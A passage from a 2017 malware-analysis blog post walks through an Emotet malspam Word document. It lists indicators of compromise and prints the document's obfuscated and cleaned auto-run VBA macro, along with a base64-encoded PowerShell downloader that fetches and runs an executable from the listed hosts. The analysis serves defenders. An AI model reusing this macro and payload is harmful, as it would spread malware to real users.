{"id":938,"date":"2017-08-28T18:09:51","date_gmt":"2017-08-28T17:09:51","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=938"},"modified":"2017-08-28T18:13:33","modified_gmt":"2017-08-28T17:13:33","slug":"2017-08-28-malspam-leads-to-emotet-malware","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=938","title":{"rendered":"2017-08-28 Malspam Leads To Emotet Malware"},"content":{"rendered":"

For today’s post, I am walking through an Emotet malspam that we received this past Friday that contained a simple link that lead to a macro enabled Word document. Googling around I see that @dvk01uk<\/a> came across the same URLs 5 days ago. You can read that post here<\/a>. Running the maldoc in my test VM showed that the initial link was still working and downloaded an executable. When running that executable on my test VM, I saw a couple of POST requests going to dead sites. First I will walk through the script that I deobfuscated and then the traffic coming from the maldoc. <\/p>\n

For more information about Emotet, see this article<\/a> from SC Magazine. The sample that I discuss here does not seem to be using any worm like propagation techniques as described from the team at Fidelis<\/a>.<\/p>\n

Note: It was a bank holiday weekend this weekend so this post was written when I could find some free time. So the artifacts gathered may reflect different days\/times. \ud83d\ude0e<\/p>\n

For all the PCAPs and artifacts from this investigation, please see my repo located here<\/a>.<\/p>\n

IOCs:
\n=====
\nwernerbernheim[.]com[.]uy \/ 179.27.153.45 (HTTP GET)
\nvereb[.]com
\nhocompro[.]com
\nokiembociana[.]pl
\nqdecisions.com
\n62[.]39.95[.]185 (TCP:443 POST)
\n104[.]236.252[.]178 (TCP:8080 POST)<\/p>\n

Artifacts:
\n==========
\nFile name: Invoice # 9674991 Problem.doc
\nFile size: 78KB
\nFile Path: NA
\nMD5 hash: 34cd3e23fdc582c1f70670e356ae877a
\nVirustotal: http:\/\/virustotal.com\/#\/file\/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc\/community<\/a>
\nFirst Submission: 2017-08-23 06:49:36
\nDetection ratio: 31 \/ 59
\nMalwr: http:\/\/malwr.com\/analysis\/Mjk5NTJiMWQxMGQ4NGFiYWE1M2YyZTA5MDNkY2MxMmU\/<\/a>
\nHybrid Analysis: http:\/\/www.reverse.it\/sample\/24abd675f46228821dffb294e4a37f73c807330ecd972379b8a29f10dcd47cfc?environmentId=100<\/a><\/p>\n

File name: GVhZFRnuDfWvPO.exe
\nFile size: 84KB
\nFile Path: C:\\Users\\%username%\\AppData\\Local\\Temp
\nMD5 hash: 156727ee7cfa8bb40f8b43bc45c7ffba
\nVirustotal: http:\/\/virustotal.com\/#\/file\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571\/detection<\/a>
\nFirst Submission: 2017-08-23 21:24:37
\nDetection ratio: 42 \/ 65
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.reverse.it\/sample\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100<\/a> <\/p>\n

File name: serviceprov.exe
\nFile size: 84KB
\nFile Path: C:\\Users\\%username%\\AppData\\Local\\Microsoft\\Windows
\nMD5 hash: 156727ee7cfa8bb40f8b43bc45c7ffba
\nVirustotal: http:\/\/virustotal.com\/#\/file\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571\/detection<\/a>
\nFirst Submission: 2017-08-23 21:24:37
\nDetection ratio: 42 \/ 65
\nMalwr: NA
\nHybrid Analysis: http:\/\/www.reverse.it\/sample\/a4e37b828e0b0d7be329ed2343cb20f320605a72c2f44e71164eb57cc6a28571?environmentId=100 <\/a><\/p>\n

Walk Through of Script:
\n=======================
\nSo there are a couple of ways to go about getting access to the deobfuscated script. You can use tools like Olevba.py from Decalage<\/a> or oledump-py<\/a> from Didier Stevens, or my favorite OfficeMalScanner<\/a>. This walk through will focus on the use of OfficeMalScanner.<\/p>\n

Using OfficeMalScanner and the “info” option as seen in the image below, it pulled out two files that contained the malicious script (both are the same by the way).<\/p>\n

\"\"<\/a><\/p>\n

The following is the original script.<\/p>\n

\r\nAttribute VB_Name = "Module1"\r\n\r\nFunction tBXRpcutKGy()\r\nDim aUyMWUfX()\r\nxhkWNCwR = 7772\r\nReDim aUyMWUfX(7772)\r\naUyMWUfX(5756) = YrpPPTVkfY\r\n aUyMWUfX(3925) = bRtPBPVLz\r\n aUyMWUfX(6618) = 9766\r\n aUyMWUfX(1268) = 3639\r\n For xhkWNCwR = 195 To 4834\r\naUyMWUfX(xhkWNCwR) = xhkWNCwR\r\nNext\r\nEnd Function\r\n \r\nFunction bNZHkXXn()\r\nDim fgwcWMHGyB()\r\ntDkCGBrV = 7093\r\nReDim fgwcWMHGyB(7093)\r\nfgwcWMHGyB(3791) = vPaDUCnZ\r\n fgwcWMHGyB(5504) = SFmtwbbMGNK\r\n fgwcWMHGyB(1812) = cWEcUyXdZNE\r\n fgwcWMHGyB(2665) = PWUYyzCcKws\r\n fgwcWMHGyB(5997) = 3789\r\n fgwcWMHGyB(6096) = 7664\r\n fgwcWMHGyB(6787) = 9833\r\n fgwcWMHGyB(5173) = 2568\r\n fgwcWMHGyB(4031) = 8692\r\n fgwcWMHGyB(1650) = 1540\r\n For tDkCGBrV = 5297 To 3064\r\nfgwcWMHGyB(tDkCGBrV) = tDkCGBrV\r\nNext\r\nEnd Function\r\n \r\nFunction rvKVpBYcu()\r\nDim tfzRDTrcM()\r\nKSkCSdHXAED = 6811\r\nReDim tfzRDTrcM(6811)\r\ntfzRDTrcM(2322) = AtztbeErwa\r\n tfzRDTrcM(4292) = BWmDATcRZ\r\n tfzRDTrcM(6219) = SrkHKEnV\r\n tfzRDTrcM(1691) = GNsYckBaA\r\n tfzRDTrcM(1553) = vdWwxkbEfaE\r\n tfzRDTrcM(6398) = 1299\r\n tfzRDTrcM(4502) = 452\r\n tfzRDTrcM(3842) = 2596\r\n tfzRDTrcM(4721) = 6226\r\n For KSkCSdHXAED = 3469 To 302\r\ntfzRDTrcM(KSkCSdHXAED) = KSkCSdHXAED\r\nNext\r\nEnd Function\r\n \r\nFunction uTHgFyyV()\r\nDim hHHLDTgS()\r\nvFEENKuL = 6335\r\nReDim hHHLDTgS(6335)\r\nhHHLDTgS(4533) = AxczdFwCbpa\r\n hHHLDTgS(3443) = DLkLaUttwk\r\n hHHLDTgS(2456) = 1483\r\n hHHLDTgS(889) = 7409\r\n hHHLDTgS(232) = 6145\r\n For vFEENKuL = 6324 To 1071\r\nhHHLDTgS(vFEENKuL) = vFEENKuL\r\nNext\r\nEnd Function\r\n \r\nFunction zyRhMZtEF()\r\nDim fTnNwrrLgAF()\r\nsvuKLgcmw = 4953\r\nReDim fTnNwrrLgAF(4953)\r\nfTnNwrrLgAF(4597) = cBheKFWLWgx\r\n fTnNwrrLgAF(2506) = XXXdnEykpYH\r\n fTnNwrrLgAF(4417) = wgHZUYBb\r\n fTnNwrrLgAF(4436) = VuUMkDrCwv\r\n fTnNwrrLgAF(2230) = 3094\r\n fTnNwrrLgAF(4629) = 8894\r\n fTnNwrrLgAF(1882) = 6101\r\n fTnNwrrLgAF(1650) = 226\r\n fTnNwrrLgAF(1301) = 9588\r\n fTnNwrrLgAF(3423) = 882\r\n For svuKLgcmw = 1730 To 2054\r\nfTnNwrrLgAF(svuKLgcmw) = svuKLgcmw\r\nNext\r\nEnd Function\r\n \r\nFunction kVfxxgeZTcx()\r\nDim cNhmaTXxm()\r\nBmnMsurwx = 8738\r\nReDim cNhmaTXxm(8738)\r\ncNhmaTXxm(2107) = rYpHhaXM\r\n cNhmaTXxm(4239) = ssbeCguByfD\r\n cNhmaTXxm(6984) = TyDznyPyeks\r\n cNhmaTXxm(8257) = 312\r\n cNhmaTXxm(133) = 6779\r\n cNhmaTXxm(3494) = 6258\r\n For BmnMsurwx = 5098 To 1531\r\ncNhmaTXxm(BmnMsurwx) = BmnMsurwx\r\nNext\r\nEnd Function\r\n \r\nFunction zxDDnHtE()\r\nDim xxAHkeRpfGX()\r\nBGLnTuFBWd = 2487\r\nReDim xxAHkeRpfGX(2487)\r\nxxAHkeRpfGX(1258) = FusggnCkM\r\n xxAHkeRpfGX(298) = vPtBDYEkrT\r\n xxAHkeRpfGX(1863) = pgYZFanEX\r\n xxAHkeRpfGX(1971) = TVrCVXdFsrN\r\n xxAHkeRpfGX(332) = tAcsBWNwS\r\n xxAHkeRpfGX(1618) = MzUGSBNYN\r\n xxAHkeRpfGX(789) = 7981\r\n xxAHkeRpfGX(2421) = 7966\r\n xxAHkeRpfGX(138) = 4484\r\n xxAHkeRpfGX(2163) = 9150\r\n xxAHkeRpfGX(1103) = 1880\r\n For BGLnTuFBWd = 438 To 2203\r\nxxAHkeRpfGX(BGLnTuFBWd) = BGLnTuFBWd\r\nNext\r\nEnd Function\r\n \r\nFunction fvUmWakZZYK()\r\nDim TSWvdtKMh()\r\nvwPpbCTn = 7944\r\nReDim TSWvdtKMh(7944)\r\nTSWvdtKMh(7122) = tgNRdsMwt\r\n TSWvdtKMh(3881) = brbXLzLWtH\r\n TSWvdtKMh(2436) = muXZpUfPGaL\r\n TSWvdtKMh(4599) = mCxafFNNa\r\n TSWvdtKMh(1118) = 3467\r\n TSWvdtKMh(2552) = 6452\r\n TSWvdtKMh(7686) = 6721\r\n For vwPpbCTn = 7878 To 7420\r\nTSWvdtKMh(vwPpbCTn) = vwPpbCTn\r\nNext\r\nEnd Function\r\n \r\nFunction CgAdLyezp()\r\nDim PfDSCfau()\r\neHBADPnM = 5319\r\nReDim PfDSCfau(5319)\r\nPfDSCfau(4753) = VXsMybXeaA\r\n PfDSCfau(3102) = CNKLPEdUfm\r\n PfDSCfau(1100) = LHcTEumpTTm\r\n PfDSCfau(2463) = xaBCaVhG\r\n PfDSCfau(2793) = 7975\r\n PfDSCfau(4802) = 5773\r\n PfDSCfau(2858) = 6001\r\n PfDSCfau(4300) = 7075\r\n PfDSCfau(4664) = 8911\r\n For eHBADPnM = 2922 To 4875\r\nPfDSCfau(eHBADPnM) = eHBADPnM\r\nNext\r\nEnd Function\r\n \r\nFunction wvFMSCtgSB()\r\nDim UDYkpKHVvc()\r\nmmGwMYbWa = 3559\r\nReDim UDYkpKHVvc(3559)\r\nUDYkpKHVvc(2024) = btKHhNusS\r\n UDYkpKHVvc(2015) = uSRnWNHzvW\r\n UDYkpKHVvc(1996) = LnDZbkwhpEY\r\n UDYkpKHVvc(156) = 6808\r\n UDYkpKHVvc(1741) = 3548\r\n UDYkpKHVvc(1625) = 4118\r\n For mmGwMYbWa = 1128 To 3240\r\nUDYkpKHVvc(mmGwMYbWa) = mmGwMYbWa\r\nNext\r\nEnd Function\r\n \r\nFunction DKWTEVRRMBN()\r\nDim cXszFrzwURz()\r\ncyLYRTKSSdC = 7004\r\nReDim cXszFrzwURz(7004)\r\ncXszFrzwURz(3595) = gtyrxgwS\r\n cXszFrzwURz(2615) = PzfKEZMsBW\r\n cXszFrzwURz(5245) = BNZkwMNR\r\n cXszFrzwURz(4066) = WRscespGr\r\n cXszFrzwURz(3282) = FHMwanSUR\r\n cXszFrzwURz(6547) = 2845\r\n cXszFrzwURz(6240) = 4262\r\n cXszFrzwURz(4314) = 5615\r\n cXszFrzwURz(4342) = 3162\r\n For cyLYRTKSSdC = 3463 To 1101\r\ncXszFrzwURz(cyLYRTKSSdC) = cyLYRTKSSdC\r\nNext\r\nEnd Function\r\n\r\nSub autoopen()\r\n\tGnLpEPBGuvx\r\nEnd Sub\r\n\r\nPublic Function ugCunPaK(sTzHXsUeNU)\r\n\tugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + SNnkzEnw\r\nEnd Function\r\n\r\nPublic Function dZmAMvagz()\r\nnXywrxED = "KMEtckFDb"\r\n vXhCxGNDf = "MSryEeLx"\r\n fUpMfRAmTtm = "PDZKSskkZW"\r\n nHLDemZX = "MGRCSwyH"\r\n ZFHHcWys = "hbUxpPAm"\r\n RuUFXAPLH = "fLuFrCSY"\r\n DFBrGCMHmkE = "SFbeZuebNsh"\r\n fbtDPfDett = ugCunPaK("LfRkbnymP") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")\r\nBNVewnkk = "UrpABZmTnr"\r\n naakDWndM = "yKZfYFAYKfy"\r\n\r\namRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")\r\nSekyzxBsr = amRFZWXULCs + fbtDPfDett\r\naRSdcDurYRy = "AswGHnGuMza"\r\n dZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""\r\nEnd Function\r\n\r\nPublic Function uMvWKNsFzRd()\r\n\tuMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy") + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + KchPUyEn\r\nEnd Function\r\n\r\nPublic Function GnLpEPBGuvx()\r\n\tCreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz + UrwupfwKDga + ydwzhPhAVZ + NfKNKKfm + hbngeuKbpan + tapuwDfPB + rzLKMSrh + MKzPmYSbSpR + yGbrgXSCbLY + KbfvhcWZtc + RtUEcxFu + LHxhzkDv, 0\r\nEnd Function\r\n\r\nFunction KWgbkykHZP()\r\nDim RfxRMkmmzZ()\r\napHNVUBpU = 7904\r\nReDim RfxRMkmmzZ(7904)\r\nRfxRMkmmzZ(1286) = xXcDTbkGSW\r\n RfxRMkmmzZ(2064) = EMsevfdYYka\r\n RfxRMkmmzZ(5661) = EMwVBBWVW\r\n RfxRMkmmzZ(1307) = UBXmtnHhnTE\r\n RfxRMkmmzZ(1470) = TXfbKEVeKC\r\n RfxRMkmmzZ(73) = 5450\r\n RfxRMkmmzZ(965) = 9043\r\n RfxRMkmmzZ(229) = 4176\r\n RfxRMkmmzZ(274) = 7658\r\n RfxRMkmmzZ(6802) = 9707\r\n For apHNVUBpU = 6746 To 204\r\nRfxRMkmmzZ(apHNVUBpU) = apHNVUBpU\r\nNext\r\nEnd Function\r\n \r\nFunction KRLsRUxSsUC()\r\nDim VxVayeNKuY()\r\nkxcsPUvhp = 9719\r\nReDim VxVayeNKuY(9719)\r\nVxVayeNKuY(5743) = XrTSuwmVh\r\n VxVayeNKuY(2356) = wMrdhDPCbE\r\n VxVayeNKuY(9379) = AGvwbVmarcD\r\n VxVayeNKuY(7940) = 8601\r\n VxVayeNKuY(8579) = 5842\r\n VxVayeNKuY(6218) = 4932\r\n VxVayeNKuY(7419) = 7205\r\n VxVayeNKuY(4097) = 3279\r\n For kxcsPUvhp = 1802 To 5262\r\nVxVayeNKuY(kxcsPUvhp) = kxcsPUvhp\r\nNext\r\nEnd Function\r\n \r\nFunction rspLFEBgVZ()\r\nDim CwwVvdVSvHE()\r\nVSSWyeEK = 4631\r\nReDim CwwVvdVSvHE(4631)\r\nCwwVvdVSvHE(2943) = KnLswFvuSNH\r\n CwwVvdVSvHE(1407) = rXAPeuFkeE\r\n CwwVvdVSvHE(2405) = rZfSvkrkUs\r\n CwwVvdVSvHE(4079) = EYeXZuXzV\r\n CwwVvdVSvHE(808) = 4846\r\n CwwVvdVSvHE(2419) = 6206\r\n For VSSWyeEK = 1315 To 2061\r\nCwwVvdVSvHE(VSSWyeEK) = VSSWyeEK\r\nNext\r\nEnd Function\r\n \r\nFunction KuCFZsbGvfm()\r\nDim RuxuvpKcyh()\r\nFMCSSBse = 2712\r\nReDim RuxuvpKcyh(2712)\r\nRuxuvpKcyh(2072) = uHuEphMy\r\n RuxuvpKcyh(2457) = NgyfMkumRn\r\n RuxuvpKcyh(1760) = xfzSnfCFENf\r\n RuxuvpKcyh(703) = rehrZhEW\r\n RuxuvpKcyh(655) = 8514\r\n RuxuvpKcyh(1385) = 6813\r\n For FMCSSBse = 528 To 1670\r\nRuxuvpKcyh(FMCSSBse) = FMCSSBse\r\nNext\r\nEnd Function\r\n \r\nFunction FFMwgaYM()\r\nDim FBdFYFybY()\r\nfDvNBaxmpMw = 2610\r\nReDim FBdFYFybY(2610)\r\nFBdFYFybY(1373) = PCkLDZhMgc\r\n FBdFYFybY(865) = PehxeTTXude\r\n FBdFYFybY(2007) = 6045\r\n FBdFYFybY(1892) = 1724\r\n FBdFYFybY(96) = 73\r\n FBdFYFybY(2261) = 4950\r\n FBdFYFybY(1865) = 902\r\n For fDvNBaxmpMw = 2409 To 2155\r\nFBdFYFybY(fDvNBaxmpMw) = fDvNBaxmpMw\r\nNext\r\nEnd Function\r\n \r\nFunction emrKSCdBkA()\r\nDim EPrzzbNhTDw()\r\nYCcSTMZV = 4386\r\nReDim EPrzzbNhTDw(4386)\r\nEPrzzbNhTDw(3407) = LYxmCkPnB\r\n EPrzzbNhTDw(4277) = sbHVZmyS\r\n EPrzzbNhTDw(713) = tehkErHMZ\r\n EPrzzbNhTDw(1392) = bKpbxcVgck\r\n EPrzzbNhTDw(3363) = 5378\r\n EPrzzbNhTDw(2300) = 8663\r\n EPrzzbNhTDw(1330) = 764\r\n EPrzzbNhTDw(2300) = 2578\r\n EPrzzbNhTDw(2226) = 1081\r\n EPrzzbNhTDw(2022) = 3830\r\n For YCcSTMZV = 2370 To 1408\r\nEPrzzbNhTDw(YCcSTMZV) = YCcSTMZV\r\nNext\r\nEnd Function\r\n \r\nFunction UGHFGXMDmY()\r\nDim ptvYBrECdr()\r\nTUcEUXCkuK = 9074\r\nReDim ptvYBrECdr(9074)\r\nptvYBrECdr(8210) = HDKVGwRavL\r\n ptvYBrECdr(8972) = gkALasxL\r\n ptvYBrECdr(8712) = hActVXbu\r\n ptvYBrECdr(6182) = vcMkyVUtD\r\n ptvYBrECdr(1196) = EfhGUuVXbdV\r\n ptvYBrECdr(8154) = hyyxpMgkBT\r\n ptvYBrECdr(6025) = 629\r\n ptvYBrECdr(8192) = 190\r\n ptvYBrECdr(6255) = 8494\r\n For TUcEUXCkuK = 2971 To 8016\r\nptvYBrECdr(TUcEUXCkuK) = TUcEUXCkuK\r\nNext\r\nEnd Function\r\n \r\nFunction vsReyNEk()\r\nDim FGNPxDgR()\r\ndNppxZwPpcb = 4284\r\nReDim FGNPxDgR(4284)\r\nFGNPxDgR(357) = nLSUvpBn\r\n FGNPxDgR(2296) = GmHrPzWe\r\n FGNPxDgR(2084) = yBpTvyTCAX\r\n FGNPxDgR(3032) = kFXYfefe\r\n FGNPxDgR(3090) = 700\r\n FGNPxDgR(2415) = 7683\r\n FGNPxDgR(3723) = 1696\r\n For dNppxZwPpcb = 3075 To 3180\r\nFGNPxDgR(dNppxZwPpcb) = dNppxZwPpcb\r\nNext\r\nEnd Function\r\n \r\nFunction pCHhXMbL()\r\nDim gTbYDYvnCFK()\r\nkSrFLzhF = 6984\r\nReDim gTbYDYvnCFK(6984)\r\ngTbYDYvnCFK(1465) = MfhnzDds\r\n gTbYDYvnCFK(1976) = NWtAppGka\r\n gTbYDYvnCFK(3497) = UuXfxzyYkt\r\n gTbYDYvnCFK(5413) = XPmZdgwFmB\r\n gTbYDYvnCFK(5110) = wxwhYeCeBN\r\n gTbYDYvnCFK(2916) = 4252\r\n gTbYDYvnCFK(5255) = 813\r\n gTbYDYvnCFK(222) = 4637\r\n gTbYDYvnCFK(1608) = 5961\r\n gTbYDYvnCFK(4251) = 6310\r\n gTbYDYvnCFK(2972) = 6903\r\n For kSrFLzhF = 3058 To 574\r\ngTbYDYvnCFK(kSrFLzhF) = kSrFLzhF\r\nNext\r\nEnd Function\r\n \r\nFunction WhBTkeGK()\r\nDim YFxKLWsAfp()\r\nwzGAvURR = 2449\r\nReDim YFxKLWsAfp(2449)\r\nYFxKLWsAfp(1730) = eYhtkWzXts\r\n YFxKLWsAfp(1916) = rWbMKXtXUt\r\n YFxKLWsAfp(503) = 7093\r\n YFxKLWsAfp(1507) = 9360\r\n For wzGAvURR = 1171 To 1136\r\nYFxKLWsAfp(wzGAvURR) = wzGAvURR\r\nNext\r\nEnd Function\r\n \r\nFunction SZcFhkaBYck()\r\nDim xwwxcbkkpw()\r\npSmPsyteH = 692\r\nReDim xwwxcbkkpw(692)\r\nxwwxcbkkpw(339) = KxUbDzCKvv\r\n xwwxcbkkpw(192) = UuLeTrtn\r\n xwwxcbkkpw(199) = WSmyTyrgDpm\r\n xwwxcbkkpw(307) = vrVhCxnBFmu\r\n xwwxcbkkpw(511) = yMpmVNbxxZZ\r\n xwwxcbkkpw(270) = 3133\r\n xwwxcbkkpw(489) = 667\r\n xwwxcbkkpw(566) = 887\r\n xwwxcbkkpw(209) = 9747\r\n For pSmPsyteH = 314 To 461\r\nxwwxcbkkpw(pSmPsyteH) = pSmPsyteH\r\nNext\r\nEnd Function<\/pre>\n
One of the things that I have learned while trying (emphasis on trying) to deobfuscate scripts and learning this art is that one should just glance through the script to see if anything stands out (keywords, URLs, paths, etc…). With this script, the first thing that stood out was the sub autoopen procedure, and then the middle section since it contained things like “ActiveDocument.CustomDocumentProperties” and “ActiveDocument.BuiltInDocumentProperties(“Comments”).” Doing a quick double click in Sublime Text with some of the other function names showed that nothing was calling them and was added to script to confuse the analyst. Below is the cleaned up script.<\/p>\n
\r\nSub autoopen()\r\n\tGnLpEPBGuvx\r\nEnd Sub\r\n\r\nPublic Function GnLpEPBGuvx()\r\n\tCreateObject(uMvWKNsFzRd + ugCunPaK("hafbyEHH") + ugCunPaK("gsbuMzRpUVs")).Run$ dZmAMvagz, 0\r\nEnd Function\r\n\r\nPublic Function dZmAMvagz()\r\n\tfbtDPfDett = ugCunPaK("LfRkbnymP") + ugCunPaK("KaGzyXtDkNm") + ugCunPaK("NfKBcxXvzGh") + ugCunPaK("BDwuRPNPN")\r\n\tamRFZWXULCs = ugCunPaK("kgvXgFbt") + ugCunPaK("gTmRgTPkG") + ugCunPaK("VNbtSPzwZ") + ugCunPaK("UmCYHMCwU") + ugCunPaK("nmPWNzEc")\r\n\tSekyzxBsr = amRFZWXULCs + fbtDPfDett\r\n\tdZmAMvagz = SekyzxBsr + ActiveDocument.BuiltInDocumentProperties("Comments") + ""\r\nEnd Function\r\n\r\nPublic Function ugCunPaK(sTzHXsUeNU)\r\n\tugCunPaK = ActiveDocument.CustomDocumentProperties(sTzHXsUeNU) \r\nEnd Function\r\n\r\nPublic Function uMvWKNsFzRd()\r\n\tuMvWKNsFzRd = ugCunPaK("FEdDZxrN") + ugCunPaK("eZumagfGLaB") + ugCunPaK("tAxtxcsvzy")\r\nEnd Function<\/pre>\n
One thing to note with this script is that it is calling data held in the Word document itself via “ActiveDocument.CustomDocumentProperties” and “ActiveDocument.BuiltInDocumentProperties(“Comments”).” When you look at the Word document via it’s properties, there is a new tab called “Custom” with the following data:<\/p>\n
\"\"<\/a><\/p>\n
When you look at the “Details” tab, there is a section within there called “Comments” with the following long string:<\/p>\n
\r\nJAB7AHcAYABzAEMAUgBgAEkAUABUAH0AIAA9ACAALgAoACIAewAxAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAbwBiAGoAZQBjACcALAAnAG4AZQB3AC0AJwAsACcAdAAnACkAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAKAAiAHsANAB9AHsAMAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACcAcgBpAHAAJwAsACcAUwBoAGUAbABsACcALAAnAC4AJwAsACcAdAAnACwAJwBXAFMAYwAnACkAOwAkAHsAVwBFAEIAYwBgAGwAaQBFAGAATgBUAH0AIAA9ACAALgAoACIAewAzAH0AewAyAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAGoAZQAnACwAJwBjAHQAJwAsACcAZQB3AC0AbwBiACcALAAnAG4AJwApACAAKAAiAHsAMwB9AHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9ACIAIAAtAGYAIAAnAHQAJwAsACcAdAAnACwAJwAuAE4AZQAnACwAJwBTAHkAcwB0AGUAbQAnACwAJwAuAFcAZQBiAEMAbABpAGUAbgAnACkAOwAkAHsAUgBBAG4AYABkAGAATwBtAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAtAGYAJwBuAGUAJwAsACcALQBvAGIAagBlAGMAdAAnACwAJwB3ACcAKQAgACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAgACcAbwAnACwAJwByAGEAbgBkACcALAAnAG0AJwApADsAJAB7AHUAYABSAEwAUwB9ACAAPQAgACgAIgB7ADAAfQB7ADEANwB9AHsAMgAwAH0AewAzADAAfQB7ADIAOAB9AHsAMgA5AH0AewAzAH0AewAxADEAfQB7ADEANQB9AHsAMgAzAH0AewAyADEAfQB7ADIANQB9AHsAMQA2AH0AewAyAH0AewA3AH0AewAxADMAfQB7ADEAMgB9AHsAMgA3AH0AewAxADAAfQB7ADQAfQB7ADEAOQB9AHsAMQB9AHsAMgA0AH0AewA1AH0AewA5AH0AewAxADgAfQB7ADEANAB9AHsANgB9AHsAMgA2AH0AewAyADIAfQB7ADgAfQAiACAALQBmACAAJwBoACcALAAnAG0ALwBKAGwAVAAnACwAJwByAGUAYgAuAGMAbwBtAC8AUwBPACcALAAnAHkAJwAsACcAaABvAGMAbwBtAHAAcgBvAC4AYwAnACwAJwB0AHAAOgAvAC8AbwBrAGkAZQAnACwAJwBoAEMAZwBHAE8ALwAsAGgAdAB0AHAAOgAvAC8AcQBkAGUAYwBpAHMAaQBvAG4AcwAuAGMAbwBtACcALAAnAGcAaABWAFMALwAsACcALAAnAHoALwAnACwAJwBtAGIAbwBjAGkAJwAsACcALwAvACcALAAnAC8AYwBhAHAAYQBjAGkAdABhAGMAaQAnACwAJwB0ACcALAAnAGgAJwAsACcAbgBhAC4AcABsAC8AaQAnACwAJwBvAG4ALwBiACcALAAnAGUAJwAsACcAdAB0AHAAOgAvAC8AdwBlACcALAAnAGEAJwAsACcAbwAnACwAJwByAG4AZQAnACwAJwBMAFQAJwAsACcATAByAHcAagAnACwAJwBNACcALAAnAHMAegBXAC8ALABoAHQAJwAsACcAQgByAGMASQBFAC8ALABoAHQAdABwADoALwAvAHYAJwAsACcALwAnACwAJwB0AHAAOgAnACwAJwBlAGkAbQAuAGMAJwAsACcAbwBtAC4AdQAnACwAJwByAGIAZQByAG4AaAAnACkALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBTAHAAbABpACcALAAnAHQAJwApAC4ASQBuAHYAbwBrAGUAKAAnACwAJwApADsAJAB7AG4AYQBgAE0AZQB9ACAAPQAgACQAewBSAEEATgBEAGAATwBtAH0ALgAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAeAB0ACcALAAnAG4AZQAnACkALgBJAG4AdgBvAGsAZQAoADEALAAgADYANQA1ADMANgApADsAJAB7AFAAYQBgAFQASAB9ACAAPQAgACQAewBlAGAATgB2ADoAdABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBuAEEAYABtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAcgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAEMAbABpAEUAYABOAHQAfQAuACgAIgB7ADIAfQB7ADAAfQB7ADMAfQB7ADEAfQAiACAALQBmACAAJwBsACcALAAnAEYAaQBsAGUAJwAsACcARABvAHcAbgAnACwAJwBvAGEAZAAnACkALgBJAG4AdgBvAGsAZQAoACQAewBVAGAAUgBMAH0ALgAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBUACcALAAnAG8AUwB0AHIAaQBuAGcAJwApAC4ASQBuAHYAbwBrAGUAKAApACwAIAAkAHsAcABBAGAAVABIAH0AKQA7AC4AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACcAUwB0AGEAcgB0AC0AUAByACcALAAnAG8AYwBlACcALAAnAHMAcwAnACkAIAAkAHsAcABgAEEAdABIAH0AOwBiAHIAZQBhAGsAOwB9AGMAYQB0AGMAaAB7AC4AKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAJwB3AHIAaQB0AGUALQBoACcALAAnAHMAdAAnACwAJwBvACcAKQAgACQAewBfAH0ALgAiAEUAeABjAEUAUAB0AGAAaQBgAE8AbgAiAC4AIgBtAEUAcwBTAGAAQQBHAGUAIgA7AH0AfQANAAoA<\/pre>\n
\"\"<\/a><\/p>\n
Interestingly enough, if you open the Word document and go back to the properties of the file, the “Custom” tab and the data within “Comments” field are gone. If you close out the Word doc, they come back. So the script above is using these bits embedded into the Word file itself for something. We will get to that in a moment. <\/p>\n
So when looking at this macro, like any macro enabled Word document, I started off looking at the sub procedure called autoopen which calls the function ‘GnLpEPBGuvx’. This function creates an object as seen via ‘CreateObject’ while also calling the ‘uMvWKNsFzRd’, ‘ugCunPaK’, and ‘dZmAMvagz’ functions.<\/p>\n
